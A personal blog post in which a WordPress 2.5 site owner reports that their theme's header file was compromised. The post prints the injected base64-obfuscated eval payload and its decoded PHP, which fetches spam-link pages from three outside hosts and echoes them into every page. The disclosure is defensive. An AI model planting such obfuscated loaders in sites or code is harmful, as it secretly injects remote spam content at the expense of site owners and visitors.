Or rather, my blog did.
You may remember there were posts floating about on the blogosphere earlier this month pertaining to an exploit in Wordpress 2.5 that individuals were using to inject malicious code into Wordpress files which would include spammy links into your page content. I just discovered that I was a victim of such an attack.
The code was placed in my theme’s header file, base64 encoded just as the article said it would be:
eval(base64_decode('ZnVuY3Rpb24gR2V0Q29udGVudCgpCnsKZXJyb3JfcmVwb3J0aW5nKDApOwokbWlycm9ycz1hcnJheSgiaHR0cDovL2xhcnJ5bWFnaWQuY29tL2xpbmtzLmh0bWwiLCAiaHR0cDovL
2xpbmstb3MuZnJlZWhvc3RpYS5jb20vbGlua3MuaHRtbCIsICJodHRwOi8vYmxvZy5ibHVlZmlyZS50di93cC1jb250ZW50L2xpbmtzLmh0bWwiKTsKZm9yZWFjaCgkbWlycm9ycyBhcyAkayA9PiAkdikKIC
AgIHsKICAgIGlmKCRjb250ZW50PWZpbGVfZ2V0X2NvbnRlbnRzKCR2KSkgYnJlYWs7CiAgICB9CmlmICgkY29udGVudD09IiIpe3JldHVybiAiPCEtLSBsaW5rcyBub3QgZm91bmQgLS0+Ijt9CnJldHVybiA
kY29udGVudDsKfQplY2hvIEdldENvbnRlbnQoKTsK'));
When decoded, the above code just so happens to be:
function GetContent() { error_reporting(0); $mirrors=array("http://larrymagid.com/links.html", "http://link-os.freehostia.com/links.html", "http://blog.bluefire.tv/wp-content/links.html"); foreach($mirrors as $k => $v) { if($content=file_get_contents($v)) break; } if ($content==""){return "";} return $content; } echo GetContent();
For the PHP illiterate among you readers, that code basically says to download a bunch of html files from suspicious sites containing spammy links (Viagra, Cialis, etc. among all else) and input them into my blog’s code.
The issue has now been fixed, and apologies to anyone who was affected by the problem.
Carry on.
If you liked this post, buy me a coffee!
